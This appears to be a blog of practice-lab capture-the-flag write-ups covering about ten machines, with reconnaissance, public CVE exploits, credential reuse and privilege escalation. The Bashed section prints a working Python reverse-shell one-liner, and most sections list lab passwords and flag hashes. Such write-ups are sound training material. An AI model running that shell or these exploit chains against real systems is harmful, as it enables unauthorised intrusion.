kami@kali:~$ journalctl
-
Expressway writeup
10.129.238.52
Scanned the machine with rustscan.
I found it strange that only ssh was open. I reran rustscan in case and scanned udp ports.
I searched exploits for OpenSSH 10.0p2 but could not find anything. Checked hacktricks for port 500 udp https://hacktricks.wiki/en/network-services-pentesting/ipsec-ike-vpn-pentesting.html. Looks like this has to do with IPsec VPN. From the article we can run ike-scan to get some information.
The ‘Auth=PSK’ means there is a VPN configured with a preshared key. Also with the last line and the knowledge from hacktricks, the machine is configured for IPsec and is willing o perform IKE negotiation. We can do further fingerprinting with this. This will help us to guess the VPN vendor.
We can capture the PSK hash next.
Then we need to crack it. I’ll use hashcat.
From the PSK it appears we also receive a user of ike@expressay.htb. Downloaded ikeforce and tried connecting but was having issues. So I was stuck here for a while trying to find out what I can do next. I got a hint and this is something I need to ingrain in my brain. We have a user and a password, though my thought was this is to the VPN there can be password reuse. I used it on ssh and this let us log in.
Sudo -l gives us some weird prompt.
I tried the password we have and also spiderman because for some reason I feel like #3 is a spiderman reference. I don’t watch marvel though lol sorry. This may be something useful to check out later.
/etc/shadow not listable. /etc/passwd no other user. Check verion of machine, crontab, network and navigated around a few files. Sudo version is interesting.
Found this https://github.com/K1tt3h/CVE-2025-32463-POC. Read through the exploit, it’s small and nano is on the victim machine so I just created exploit.sh and copied the code. Ran it and we get root.
GG
-
Retro writeup
10.129.234.44
Scanned the target with rustscan.
Right off the bat this looks like an AD machine. Ran ldapsearch and we get some information back.
Ran enum4linux-ng and rpcclient but but no interesting results back. Tried querying user information but to no avail. Scanned users with kerbrute.
Also checked out smb with smbclient. Notes I had permission to connect but not view files. Trainees I found an important.txt.
Looks like that trainee account earlier may have a bruteforcable password.
Ran kerbrute
While that was running I just tried super simple passwords and the creds are actually trainee:trainee. We can see things in the Notes share now.
Downloaded those. User.txt is the flag.
Earlier we also seen that banking account. Maybe that is bruteforcable or has super simple creds too. There’s also a Thomans and James and I assume they are the tblack and jburley. Started my bruteforce on banking.
While that runs, since we have credentials of trainee, we may be able to find more information in the environment being authenticated. Ran rpcclient but gave us information we already know.
Ran ldapdomaindump.
Read some of the output.
Important takeaways, banking is a computer account and not a user account. Also something to note is that Thomas and James have different permissions. Ran crackmapexec next with some simple credentials and banking works too.
Ran impacket but it looks like the password needs to be changed after it erroring and researching the error.
I tried a few things but had no success. At this point I’ll just run bloodhound.
And after installing it on this machine for the first time it actually crashed my computer. My computer isn’t great so this is a sign that I’ll need to get a new device. I just went back to trying to resetting the password. After a bit, impacket-changepasswd worked for me.
Now we can check for AD Certificate services.
From the output, we find out we can request a certificate for another user with the ESC1 vulnerability.
With a lot of reading and talking to AI next steps I grabbed a certificate and authenticated with a new tool certipy-ad. Then we add the trainee account to domain admin.
Used evil-winrm to get a shell and get root.txt.
GG
-
Sau writeup
10.129.229.26
Scanned the machine with rustscan.
Not entirely familiar of port 55555. It shows it’s Goglang http server though. Navigated to it in a web browser.
On this site it looks like we can create a basket. When clicking create it gives us a token. Mine is: tK7SQ3xHZYOdGLHKChQ0v8VXO1CRciE03IgCyvysIY4y
Created the basket at /hjkom0j
I’m wondering if I can get shell into the basket. Before putting more thought into that I poked around more and got a version number at the bottom of the screen on another page.
Searchsploit didn’t show anything. I googled the version for exploits though and it looks like there is a SSRF vulnerability. Here is a github for an exploit https://github.com/Khalidhaimur/exploit-request-baskets-1.2.1. This code was actually built for this room seen in the readme so hopefully this isn’t considering cheating. I downloaded this exploit but it appears that this will just set up a forwarded but not give us any access. After poking around, if we play with the options of the basket we can set it to an internal webserver that has Malttrail v0.53 on it.
Googling an exploit for this I found this https://github.com/spookier/Maltrail-v0.53-Exploit. I don’t think I even need the original exploit now, I thought I’d have to chain them.
Set up a listener and used the exploit.
And we actually got a shell.
Submit User Flag –
A: 223cb50bc529e7b1dc781121489128bf
Looking for a quick win I ran sudo -l and this looks like it may be interesting.
As that only checks the status of the service running, eventually I checked the version of systemctl.
Googling it I found this exploit https://nvd.nist.gov/vuln/detail/CVE-2023-26604.This post was the easiest to read through and the most insightful in my opinion https://medium.com/%40zenmoviefornotification/saidov-maxim-cve-2023-26604-c1232a526ba7. Read through the post, followed it and got root.
Submit Root Flag –
A: 417c3049c5125d63d284c3355bd1e0b7
GG
-
Broker writeup
10.129.230.87
Scanned the machine with rustscan.
Navigated the the website but that errored out. Im unfamiliar with these other ports so I’ll just go down the list. Found this for port 1883 https://hacktricks.wiki/en/network-services-pentesting/1883-pentesting-mqtt-mosquitto.html. I ran the first commands for MitM to see if I can hear anything from the box but didn’t get anything. This just shows what nmap already showed.
I didn’t expect this to actually work since I’m not in the middle of any two devices, just on the same network. At the bottom of hacktricks there is also mention of brokers which is this boxes name. This unfortunately just looks useful for iot networks and I don’t yet know what else this machine is so I’ll leave that behind for now.
I looked up what ActiveMQ was as I saw this a few times already. It’s a webserver but it also looks like there are some exploits out there even though I didn’t find a version yet. I found this https://github.com/rootsecdev/CVE-2023-46604. It also looks like there is a metasploit module so I found that.
I set my options and I was actually having issues with this. I thought it’d make it simpler but after some time I’ll just try this manually with github.
I set up a listener.
Downloaded the poc-linux.xml file and hosted it on a webserver.
And ran the exploit.
And we’re in.
Submit User Flag –
A: 04d4c37dc4f96fbe080d9e7ed50f41ad
Ran sudo -l for quick wins.
Nginx looks interesting. Checked out GTFObins. It looks like we can upload files. Following the same pattern as other boxes, the root flag should be in root/root.txt and as this is running as root it would be allowed to. Made a temporary file and server is on port 1337.
Called it so it should be uploaded.
Then ran curl and we get root.txt
Submit Root Flag –
A: bf825aa7d3de7b4fcc8136fc4a0e961e
GG
-
Return writeup
10.129.95.241
Scanned the machine with rustscan.
We get a lot of information. Let’s check out the website first. It brings us to some admin panel.
Nothing interesting in source code or robots.txt. Will run ffuf while I check other things.
Interestingly kerberos and ldap is on the machine. I checked out port 47001 but no webserver there. Checked out the smb ports. Anonymous login it doesn’t connect.
Port 5985 I didn’t see any website either. No other possible low hanging fruits. Since this looks like active directory I’ll look at my AD notes. I’ll try an smb relay first as I recently learned this. My thought is that possibly theres a printer service that may be talking and we can catch credentials.
Left this on for 5 minutes while I poke deeper at the smb to make sure I didn’t miss anything. Nothing
I must need a domain account to interact. Let’s just start from the top and exhaust every port until I find something. I don’t think DNS will have anything but dig’ed it anyways.
Ffuf found an image directory earlier but access is denied there.
Kerberos I’m unfamiliar of anything we can do remotely to take advantage or enumerate. In my notes, I saw some LDAP enumeration though so I ran this
We now know the domain is RETURN.local. This looks to also be a domain controller printer.return.local. I need an account for further enumeration though.
I tried a brute force but that didn’t run at all. Started enum4linux but nothing from that either.
I was kind of confused on what’s going on. The webpage was the only thing I found so I relooked at it. I looked at the source code but that wasn’t matching what I was seeing on my screen (because I made the browser smaller). I realized when I fullscreened the website there was actually options I can interact with…
The only thing that looked interactive was Settings and looks like that may host a LDAP server. I updated the password to password.
SMBclient still didnt work. RPCclient neither.
I was reviewing notes and a bit stuck here. Referred to a writeup. I didn’t think about this but you can update the service address to our machine and listen on that port. That gives us credentials.
Return\svc-printer 1edFg43012!!
Attempting the rest myself. I tried the commands previously but authenticated this time. Rpcclient worked this time.
Obviously we want the Administrator account. I assumed svc-printer is low level account but I tried to change the password of the admin account but didnt work. Since we know that there’s only one machine and the priv esc will be Administrator I actually don’t think I can get more out of rpcclient after checking ‘help’. I tried playing with nxc but no luck there either. I was able to get in with evil-winrm though.
We can get the userflag.
Submit User Flag –
A: 9daec7eb00f2e3ef40e1006254593d75
We can see the root flag but not read it.
I haven’t used Evil-Winrm often so I tried downloading to my machine but it still didn’t let me read it. Kind of silly but you live and you learn. I ran netusers and actually that made me think admin may not be the target, it may be the kerberos service. Checked cmdkey /list but nothing. Tried saved creds running cmd.exe. Can’t see scheduled tasks. I was able to make a /tmp directory and write a test file, let’s see if I can get winpeas over. Hosted up a http server and downloaded.
This ended up not installing properly after taking a while. Instead of trying again I want to look at other things first. Also, I realized certutil encodes before transfers which makes the transfers longer so I’ll look into using powershell instead in the future.
I tried kerberoasting but no luck.
I don’t think I’ll get much with hacking AD so I’ll move to just simple Windows Local Enumeration again. Whoami /priv didn’t show much that I could take advantage of. Whoami /groups looks like it might be interesting.
Printer operators doesn’t look fun but this Server Operator group looks like we might be able to get privilege escalation https://www.hackingarticles.in/windows-privilege-escalation-server-operator-group/. This article actually shows the same service that we have on our machine.
I’m going to follow the exploitation method 2. Created a shell with msfvenom.
We can just upload it with Evil-WinRM.
Updated the service and stopped it (in the screenshot you can ignore because I stopped it before previously). Set up a listener then started it and we get system.
Navigated to the flag.
Submit Root Flag –
A: b028d76da84b37bf5c7c436b2f5087d4
GG
-
Grandpa writeup
10.129.95.233
Scanned the machine with rustscan. It was hanging for a while though. When pinging it wasn’t responding but my nmap already had -Pn. It eventually went through but there was only one port which was http.
Navigated to the webserver.
Nothing in robots.txt or source code. Kicked off ffuf.
While that ran I searchsploited the version of the IIS server and looks like there is a bufferoverflow exploit https://www.exploit-db.com/exploits/41738. Github for the exploit here https://github.com/eliuha/webdav_exploit. This has to be written in python2. This unfortunately didn’t work.
It looks like this takes advantage of webdav, I know I had some notes so tried further enumeration. I tried davtest but that failed.
There is a connection but the uploads failed. Instead I found a new github that calls a reverse shell using that vulnerability https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269/tree/master. Read through and ran this code and it worked.
Found a user that exist on the computer Harry and Administrator.
I found a file on All User’s desktop that may be on interest.
I was having trouble moving this over to my machine. Instead I tried to download winPEAS.exe but that failed.
Instead I just decided to do manual enumeration. Checked systeminfo first.
I googled exploits for the OS Version and came across this https://www.exploit-db.com/exploits/35936. This looks like our privesc. After poking around this looks like it had a msfconsole module. Looking back, I can also get a meterpreter shell instead. Since I’m having issue uploading manually, I decided to do that.
Booted up msfconsole.
I set my options and ran a check. It’s definitely vulnerable.
For some reason I got stuck, I referred to the writeup and they are actually using this same module. I reset my machine to see if it’s because I ran that exploit earlier. New IP is 10.129.1.210. It looks like that was the case because now I got a meterpreter shell.
Backgrounded the session, found the msconsole version of this exploit by searching MS14-070, and set options.
Ran the exploit but it was failing maybe this actually wasn’t the exploit. Ran the local_exploit_suggester module instead. Weird that it does show it’s vulnerable to that exploit but I looked through others anyways.
Ppr_flatten_rec looks to most promising but with both exploits I keep getting “[-] Exploit failed: Rex::Post::Meterpreter::RequestError stdapi_sys_config_getsid: Operation failed: Access is denied.”
I tried migrating to every service and nothing worked. All of msfconsole is not working. I even referred to MULTIPLE writeups using msfconsole, following their step by step guides and it was not working for me. Im starting over using the github scripts instead. Got a shell as a did before. I won’t even bother explaining the rest as this was one of the most frustrating machines I’ve done so far. I followed this through the end of the box https://www.youtube.com/watch?v=SkwbylFcnZM. Apparently the updated msfconsole (since this box is older) started not working with this machine that made this box a lot more difficult.
Submit User Flag-
A: bdff5ec67c3cff017f2bedc146a5d869
Submit Root Flag-
A: 9359e905a2c35f861f6a57cecf28bb7b
-
Wifinetic writeup
10.129.229.90
Scanned the machine with rustscan.
Let’s check out FTP since anonymous looks open. We can see a bunch of files.
Downloaded all the files to my machine. There’s a Employee wellness file. Key take aways- all_employees@wifinetic.htb, Samantha Wood/HR Manager/samantha.wood93@wifinetic.htb. There’s also a breadcrum documentation.
Key takeaways- management@wifinetic.htb, a migration from OpenWRT to Debian (possible old config files with credentials that are reused), and another user Oliver Walker/Wireless Network Administrator/olivia.walker17@wifinetic.htb. The last PDF doesn’t look much interesting. Extracted that backup file to review.
There’s a password file. Also disregard the path of where these files are. I accidentally put it in a CVE folder I used for the last machine. I plan to delete all of this when I’m done so I don’t care to move directories.
Netadmin may be of use. Checked config files and there is a password in /config/wireless.
VeRyUniUqWiFIPasswrd1!
I tried this on root and netadmin in ssh and we got into netadmin.
Can’t run sudo -l for an easy win. Let’s get linpeas on the device. Also we get user.txt
Submit User Flag –
A: ad72f671b05d6d5772b8029d9d0e90d7
Also while I was looking for a directory to put linpeas, I found this interesting in /home.
/tmp is writable. Hosted a http server and moved over linpeas to the victim machine.
No bash history, no cronjobs, no access to /etc/shadow. Looked for more backup files, passwords and scripts but no luck. Since this is a wifirelated box, I ran iwconfig and we do see wlan interfaces.
Airodump-ng isn’t on the device. Not sure how I would actually take advantage of this so I’ll poke around other places. Checked for SUID binaries but nothing there either.
It looks like reaver may be what we need. Attacking the bssid of wlan0 we find credentials.
WhatIsRealAnDWhAtIsNot51121!
Tried this on root and we actually got in.
Submit Root Flag –
A: bfa1f75ef3493ef35a9019e0787410e0
GG
-
Netmon writeup
10.129.230.176
Scanned the machine with Rustscan. Yesterday when I was doing a different machine rustscan it missed scanning port 80 which threw me down the wrong direction and wasted 5 minutes. Today I’m dropping the batch size from 2000 to 500 to see how that treats me from now on.
Checked out ftp first since it looks like anonymous login is allowed.
We can already get user.txt.
Downloaded it to my machine.
Submit User Flag –
A: 3f52fbc996dd3b5accc5a5b2d44a0fb4
In that directory there was mentions of a website, which we saw on port 80. Navigated to the site.
Ran ffuf while I poke around further.
In the ftp there was an inetpub but I don’t see any directories that I could use to upload files for a possible shell. I’ll keep that in the back of my mind though. Tried default credentials on the website prtgadmin:prtgadmin and a random assortment of simple credentials but nothing worked. Searchsploit but the only RCE is authenticated. This may be the path we need but I do not have any credentials right now.
Found some configurations files that may be of use in C:\ProgramData\Paessler\PRTG Network Monitor\.
I found this in the PRTG Configuration.old.bak.
So our admin target is definitely that prtgadmin. I ran cyber chef of that string that looks like a hash but didn’t get anything. I ran grep -i -A3 -B3 password PRTG* and looks like we found a possible password.
PrTg@dmin2018
This didn’t work logging into the site though. I tried checking out those other http ports 5985 and 47001 but they are Not Found. I couldn’t find anything else in the configuration files so this find must be it. It’s likely just an outdated password because is an old configuration file. After playing around with different iterations, the password turned out to be PrTg@dmin2019. We already know the exploit, here’s a github for the exploit https://github.com/A1vinSmith/CVE-2018-9276. Downloaded the exploit and ran it.
And we’re already root so we can grab the flag.
Submit Root Flag –
A: f8cb106d6321e58d4fb22ea65d229bce
GG
-
Bashed writeup
10.129.1.43
Scanned the machine with rustscan.
Only port 80 looks open. Navigated to the webserver and ran ffuf while I poke around.
Nothing interesting in source code or robots.txt. Buttons don’t do anything but navigating to the post we see a tool about phpbash that this user Arrexel created.
FFuf also found these directories.
/dev also refers to this phpbash.
Read through this guy’s github. Looks like a more visual friendly webshell. When I clicked on the phpbash.php it brought me to the shell.
We can get /etc/passwd.
I tried a bash one liner reverse shell but I didn’t get a connection.
We can get user flag.
Submit User Flag –
A: d43ec80f31f8460336aa66b47eadb189
Let’s check out the scriptmanager user.
Can’t get into .bash_history and nothing else looks useful. Can’t su into scriptmanager. I also couldn’t get linpeas on the machine.
Poked around the /var/www/html for passwords. No cronjobs. So the scriptmanager account is the only thing that looks like will bring us closer to rooting the box I think I need a way to get into that account. I tried a bunch of one liners but that didn’t work. I got stuck for a while but eventually realized that /uploads directory we saw earlier we can write to.
I tried making a test.php exploit using a php reverse shell but it looks like it keeps failing as it doesn’t that the input properly. Since this directory is writable though I was able to file transfer from my machine.
This failed too though when I tried calling it because for some reason it changed the content of test2.php.
I realized my script was bad, I regrabbed it off of pentestmonkey, put in my port and IP. Downloaded it on the victim machine but uploads looks to be static and didn’t execute it.
I got stuck here so I referred to a writeup. I’m not sure how why none of mine but this command worked.
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“10.10.14.157”,1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
Put this in my notes for later use.
Finally got a shell. We can now move over to scriptmanager.
Navigated to his directory but didn’t see anything.
After running through my linux local enumeration notes again, theres a directory in / called scripts that this user has access to.
It looks like the test.py created the test.txt. I checked crontabs but seen nothing. Weirdly though, the date and time on test.txt changed from when I first looked at it so something must be interacting with it. Wrote a shell and set up a listener.
And we got in.
Submit Root Flag –
A: 0c5afeef47fe766b6f062818f2e6ed60
GG
-
Keeper writeup
10.129.229.41
Scanned the machine with rustscan.
Navigating to the webserver we see this.
Added tickets.keeper.htb and keeper.htb to /etc/hosts. Navigated to the new site.
Searchsploitted ‘request tracker’
Running a directory busting scan first with ffuf.
Also tried default creds first. Found this, tried root:password. https://itnixpro.com/reset-default-root-password-on-request-tracker-rt/. Weirdly when I try a password that doesn’t work I get an error but when I tried root:password, it didn’t log me in but I don’t get an error.
Reading through the exploit here https://www.exploit-db.com/exploits/38459. This mentioned 4.0.10 but other versions may be vulnerable. I’m not completely confident this is the exploit.
While ffuf was still running I was checking out the other directories. /m looked like a mobile version, tried some default creds, /l didn’t go anywhere but for some reason in /rt the default creds of root:password got me in.
Poking around the site, there is a user search. I couldn’t pull anything after attempting some SQL injection though.
Something that may be interesting is a recently reviewed ticket.
Looks like someone was having an issue with Keepass and it’s on this guy’s home directory.
I have seen Keepass clients as its a sort of legacy password manager/file. It also might be good to note this guy’s name lnorgaard (Lise Norgaard).
Also got this which may be interesting.
Not sure how easy his password might be but I’ll start a brute force on ssh.
Right after I did this I clicked on his username and actually its just in the comments.
Sshed in and it worked.
Submit User Flag –
A: 0b17aab03ba2c0de88d7be575a824b05
My assumption is this zip file the Keepass file, and it is.
So when I have used Keepass in my life so far, it’s just been password protected and on Windows. I’m unsure how to interact with a keepass file on linux and how we can crack this. Did a bit of googling. Looks like john will help us https://github.com/patecm/cracking_keepass. Downloaded the file to my machine.
Tried cracking with john but that was taking forever so I kind of figured that probably wasn’t the goal. I let john run while I looked for other things though.
After a bunch of googling I found this https://nvd.nist.gov/vuln/detail/CVE-2023-32784. When googling this exploit unfortunately I saw a writeup so this must be the correct path. I found this https://github.com/vdohney/keepass-password-dumper. Looks like we’ll actually be taking advantage of the .dmp that showed up during extracting the .zip. Unfortunately this is for windows though. Found this Python we can use instead https://github.com/z-jxy/keepass_dump/tree/main. Downloaded the python exploit and ran it.
No idea what that string of test was but when I googled it, it was some sort of recipe.
Maybe Rødgrød med fløde is this dude’s Keepass password?
Installed keepass on my machine. For whatever I couldn’t copy and paste that password into the GUI. I don’t really want this on my computer, I rather have a CLI tool so I looked for that. Theres a tool called keepassxc but I had trouble with this. I was able to find kpcli instead.
I tried the recipe with a capital R but the password rødgrød med fløde got me in.
Poked around these directories and was able to find a user and password for root.
It looks like a Putty key but I checked if I can log in with user and password but I got permission denied.
Since this box is linux we would need to convert it. After some googling I found some commands to do so. Had to download putty-tools too.
It wasn’t working but turns out my formatting is off. It has to look like this.
And we’re in.
Submit User Flag –
A: 69885cdba143fb83e632ae65eb7e699d
GG
Hacking Insights by Max Bautista 